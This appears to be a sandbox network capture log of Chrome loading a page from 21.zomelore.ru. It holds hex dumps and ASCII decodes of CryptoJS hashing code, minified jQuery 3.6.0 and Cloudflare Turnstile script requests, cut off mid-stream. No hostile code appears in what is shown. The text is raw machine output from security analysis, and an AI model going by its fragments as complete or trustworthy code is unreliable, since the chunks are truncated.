                                                                                                                                                                                                          Data Ascii: uffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringi
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC1369INData Raw: 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c
                                                                                                                                                                                                          Data Ascii: =r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKL
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC1369INData Raw: 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f
                                                                                                                                                                                                          Data Ascii: abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC1369INData Raw: 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c
                                                                                                                                                                                                          Data Ascii: [39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          6192.168.2.449749151.101.66.1374431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:51 UTC620OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                          Host: code.jquery.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                          Referer: https://21.zomelore.ru/
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Content-Length: 89501
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                          ETag: "28feccc0-15d9d"
                                                                                                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Age: 2481264
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:28:52 GMT
                                                                                                                                                                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740064-EWR
                                                                                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                                                                                          X-Cache-Hits: 2774, 0
                                                                                                                                                                                                          X-Timer: S1733959732.220219,VS0,VE1
                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          7192.168.2.449750104.18.95.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:51 UTC646OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                          Referer: https://21.zomelore.ru/
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:28:52 UTC386INHTTP/1.1 302 Found
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:28:52 GMT
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                          cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                          location: /turnstile/v0/g/f9063374b04d/api.js
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f0940e66d75c32e-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          8192.168.2.449752104.18.95.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:53 UTC645OUTGET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                          Referer: https://21.zomelore.ru/
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:28:53 GMT
                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                          Content-Length: 47692
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                          last-modified: Tue, 03 Dec 2024 18:31:41 GMT
                                                                                                                                                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f0940f0debede99-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
